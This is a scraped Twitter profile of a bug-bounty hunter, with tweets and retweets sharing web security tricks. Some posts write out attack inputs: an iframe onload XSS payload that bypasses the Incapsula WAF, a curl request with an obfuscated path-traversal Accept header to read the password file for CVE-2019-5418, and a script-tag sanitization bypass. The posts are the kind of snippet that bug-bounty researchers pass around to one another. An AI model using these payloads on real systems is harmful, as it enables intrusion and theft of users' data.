YasserGersy

@yassergersy

Building stuff that eats CPU Coding lover | Physicist | Bug Hunter |

Vrijeme pridruživanja: srpanj 2011.

Tweetovi

Blokirali ste korisnika/cu @yassergersy

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @yassergersy

  1. 2. velj
    Poništi
  2. proslijedio/la je Tweet
    23. pro 2019.

    Since wanted to share some WAF bypasses, I figured I'd share the one I recently used for Incapsula. <iframe/onload="var b = 'document.domain)'; var a = 'JaV' + 'ascRipt:al' + 'ert(' + b; this['src']=a">

    Poništi
  3. proslijedio/la je Tweet
    23. pro 2019.
    Poništi
  4. 14. ruj 2019.

    : Load response , extract all valid parameters names , submit all as get and post parameters , check which one is being reflected , you will increase your chances to get

    Poništi
  5. proslijedio/la je Tweet
    25. kol 2019.
    Poništi
  6. proslijedio/la je Tweet

    to get commoncrawl assets! curl -sL | grep 'href="/CC' | awk -F'"' '{print $2}' | xargs -n1 -I{} curl -sL {}-index?url=* | awk -F'"url":\ "' '{print $2}' | cut -d'"' -f1 | sort -u | tee domain.txt

    Prikaži ovu nit
    Poništi
  7. proslijedio/la je Tweet
    21. lip 2019.

    Our new article. We cracked the IDA Pro password by predicting the PRNG!

    Poništi
  8. proslijedio/la je Tweet
    13. lip 2019.

    Short blog and POC code for CVE-2019-1040 (patched last Tuesday). Combining this vulnerability with the SpoolService bug and Kerberos delegation means: any AD user to Domain Admin; RCE on unpatched hosts; possible over Forest trusts. TL;DR: GO PATCH!

    Poništi
  9. proslijedio/la je Tweet
    10. lip 2019.

    Interesting XSS I ran into today, Input where param=value is reflected in a JSON body within a script tag. If you send param=</script>, the application sanitizes the input. This can be bypassed with param["</script>"]=whatever.

    Poništi
  10. proslijedio/la je Tweet

    Hardcoded consumer and secret key in an Android mobile application was fixed by AES/CBC encrypting it. However, the byte array generation function used to construct the decryption secret key was also hardcoded in the same java class 😂

    Poništi
  11. proslijedio/la je Tweet

    I never thought I would experience a XSS on Google Search. But blew my mind! This is a video going over the difficulties of sanitizing HTML in JavaScript.

    Poništi
  12. proslijedio/la je Tweet
    28. ožu 2019.

    Want to bypass WAF when exploiting CVE-2019-5418 ? curl -H 'Accept: ../../../../../../e*c/p*s*d{{' http://server/...

    Prikaži ovu nit
    Poništi
  13. 24. velj 2019.

    I used to share links via Googleplus , you can take a look before it goes away

    Poništi
  14. proslijedio/la je Tweet

    XSS Hunter is now successfully migrated to a more scalable setup. The SQL server now has auto-expansion for disks and regular backups and automated maintenance. Additionally everything runs on more cost-appropriate servers to make the service cheaper to run.

    Prikaži ovu nit
    Poništi
  15. 3. sij 2019.

    : Gorrila is doing this by design and some people do not read these notes allowing actions via GET resulting in dozens of csrf :D Consider this bypass by

    Tweet je nedostupan.
    Poništi
  16. 29. stu 2018.

    Exploiting post message to steal and replace user’s cookies

    Poništi
  17. proslijedio/la je Tweet
    13. stu 2018.
    Poništi
  18. proslijedio/la je Tweet
    18. srp 2018.
    Poništi
  19. proslijedio/la je Tweet
    20. lip 2018.

    📝 New post! I stumbled across a serious browser security bug & I can finally talk about it. The post covers: ➡️ An exciting new logo. ➡️ Range requests. ➡️ "No-cors" requests. ➡️ Sneaking past origin security. ➡️ The importance of standards.

    Prikaži ovu nit
    Poništi
  20. 23. lip 2018.

    1500$ button click “Account Take over via Reset-Password”

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·